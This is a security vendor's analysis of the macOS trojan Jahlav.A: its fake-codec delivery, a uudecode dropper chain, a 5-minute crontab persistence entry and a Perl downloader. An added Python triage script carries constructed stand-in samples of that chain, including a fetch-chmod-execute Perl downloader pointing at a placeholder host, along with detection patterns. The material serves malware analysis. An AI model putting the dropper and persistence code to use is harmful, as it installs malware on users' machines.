
Trojan.OSX.Jahlav.A


First posted on 21 November 2011.
Source: BitDefender

Aliases :

Trojan.OSX.Jahlav.A is also known as OSX/Jahlav-A.

Explanation :

This malware usually arrives as a disk image presented either as a key generator/crack for various applications or as a video codec needed to view videos online:



Once mounted, the image presents an install package.


The install package contains the following files :



The package contains three files which are of interest:
* Archive.pax.gz (which contains two files: AdobeFlash, Mozzilaplug.plugin)
* preinstall
* preupgrade

"AdobeFlash", "preinstall" and "preupgrade" are identical files: the same bash script under three names.

Once executed, the script drops a file using the uudecode command (http://en.wikipedia.org/wiki/Uudecode).
The dropped file is another shell script, which installs a crontab entry (the Unix equivalent of a scheduled task under Windows) that runs every 5 minutes and looks for new files to download.

The download itself is performed by a further file, also dropped with uudecode: a Perl script that downloads and executes the new malware.
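The chain described above (a bash dropper, then a uudecode-extracted shell script that installs a 5-minute crontab entry, then a uudecode-extracted Perl downloader) is what an analyst has to unwind by hand. The following Python triage helper is an added example, not BitDefender's analysis tooling and not the malware's own code: it takes a script, decodes every uuencoded block embedded in it with the same scheme uudecode(1) reads, recurses into the decoded payloads, and flags crontab installation, the cron schedule, remote fetches and file execution. It assumes the payloads are uuencoded inline in the scripts (the page only says uudecode is used); the three sample scripts are constructed stand-ins that mirror the described structure, not the real Jahlav files, and the indicator regexes are illustrative heuristics rather than a published signature set.

```python
"""Triage helper for uudecode-based multi-stage droppers.

Added example, not BitDefender's tooling or the malware's own code. Given a
script's contents it extracts every embedded uuencoded block
("begin <mode> <name>" ... "end"), decodes it the way uudecode(1) does, and
recursively scans each decoded payload for persistence and download/execute
indicators. The sample scripts at the bottom are constructed stand-ins.
"""
import binascii
import re
from dataclasses import dataclass, field

BEGIN_RE = re.compile(r"^begin\s+([0-7]{3,4})\s+(\S+)\s*$")
CRON_EVERY_N_MIN = re.compile(r"\*/(\d+)\s+\*\s+\*\s+\*\s+\*")
# Illustrative heuristics (an assumption for this example, not a published signature set).
INDICATOR_PATTERNS = {
    "drops a file with uudecode": re.compile(r"\buudecode\b"),
    "installs crontab entry": re.compile(r"\bcrontab\b"),
    "fetches remote content": re.compile(r"\b(curl|wget)\b|LWP::|HTTP::Tiny|getstore|IO::Socket"),
    "executes a dropped file": re.compile(r"\bsystem\b|\bexec\b|\bchmod\b|^\s*(sh|bash|perl)\s+\S", re.M),
}


@dataclass
class Payload:
    name: str
    mode: int
    data: bytes
    indicators: list = field(default_factory=list)
    children: list = field(default_factory=list)


def uuencode(name: str, data: bytes, mode: int = 0o755) -> str:
    """Build a uuencoded block as uuencode(1) would (used only to construct the samples)."""
    lines = [f"begin {mode:o} {name}"]
    for i in range(0, len(data), 45):  # uuencode emits 45 input bytes per line
        lines.append(binascii.b2a_uu(data[i:i + 45], backtick=True).decode("ascii").rstrip("\n"))
    lines += ["`", "end", ""]  # zero-length line, then the "end" marker
    return "\n".join(lines)


def split_uu_blocks(text: str):
    """Separate a script's own lines from the uuencoded blocks it carries.

    Returns (residual_text, [(mode, name, decoded_bytes), ...]). The first character
    of each data line encodes its byte count, a zero-length line ("`") terminates the
    data and "end" closes the block, which is how uudecode(1) reads the format.
    """
    lines, residual, blocks, i = text.splitlines(), [], [], 0
    while i < len(lines):
        m = BEGIN_RE.match(lines[i])
        if not m:
            residual.append(lines[i])
            i += 1
            continue
        mode, name, chunks = int(m.group(1), 8), m.group(2), []
        i += 1
        while i < len(lines) and lines[i].strip() != "end":
            line = lines[i].rstrip()
            if line and line[0] != "`":
                chunks.append(binascii.a2b_uu(line))
            i += 1
        blocks.append((mode, name, b"".join(chunks)))
        i += 1  # skip the "end" line
    return "\n".join(residual), blocks


def triage(name: str, mode: int, data: bytes) -> Payload:
    """Scan one script, then recurse into every payload it drops via uudecode."""
    own_text, blocks = split_uu_blocks(data.decode("utf-8", "replace"))
    p = Payload(name, mode, data)
    p.indicators += [label for label, pat in INDICATOR_PATTERNS.items() if pat.search(own_text)]
    m = CRON_EVERY_N_MIN.search(own_text)
    if m:
        p.indicators.append(f"cron schedule every {m.group(1)} minutes")
    p.children = [triage(n, md, d) for md, n, d in blocks]
    return p


def flatten(p: Payload):
    """Yield a payload and all of its descendants, outermost first."""
    yield p
    for c in p.children:
        yield from flatten(c)


# --- constructed samples mirroring the three stages described (not the real files) ---
PERL_DOWNLOADER = b"""#!/usr/bin/perl
use LWP::Simple;
my $f = "/tmp/update";
getstore("http://example.invalid/files", $f);  # .invalid is reserved and never resolves
chmod 0755, $f;
system($f);
"""
CRON_INSTALLER = (
    "#!/bin/sh\n# stage 2: drop the Perl downloader and run it from cron every 5 minutes\n"
    "cd /tmp\nuudecode <<'EOF'\n" + uuencode("update.pl", PERL_DOWNLOADER) + "EOF\n"
    "(crontab -l 2>/dev/null; echo '*/5 * * * * /usr/bin/perl /tmp/update.pl') | crontab -\n"
).encode()
PREINSTALL = (
    "#!/bin/sh\n# stage 1 (the package's preinstall script): drop and run stage 2\n"
    "cd /tmp\nuudecode <<'EOF'\n" + uuencode("stage2.sh", CRON_INSTALLER) + "EOF\n"
    "sh /tmp/stage2.sh\n"
).encode()


def triage_sample() -> Payload:
    """Unwind the constructed three-stage dropper from its outermost script."""
    return triage("preinstall", 0o755, PREINSTALL)


if __name__ == "__main__":
    for p in flatten(triage_sample()):
        print(f"{p.name} (mode {p.mode:o}, {len(p.data)} bytes): {', '.join(p.indicators)}")
```

On a real sample, pass the bytes of the extracted "preinstall" script (read from the mounted image, never executed) to `triage`; the decoded children are then available as bytes for hashing and further analysis without ever running uudecode on the sample, and the indicator list for each stage shows where the persistence (crontab) and the download/execute step live.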

At the time of this analysis, the host from which the additional malware files were downloaded was no longer available.

Last update 21 November 2011
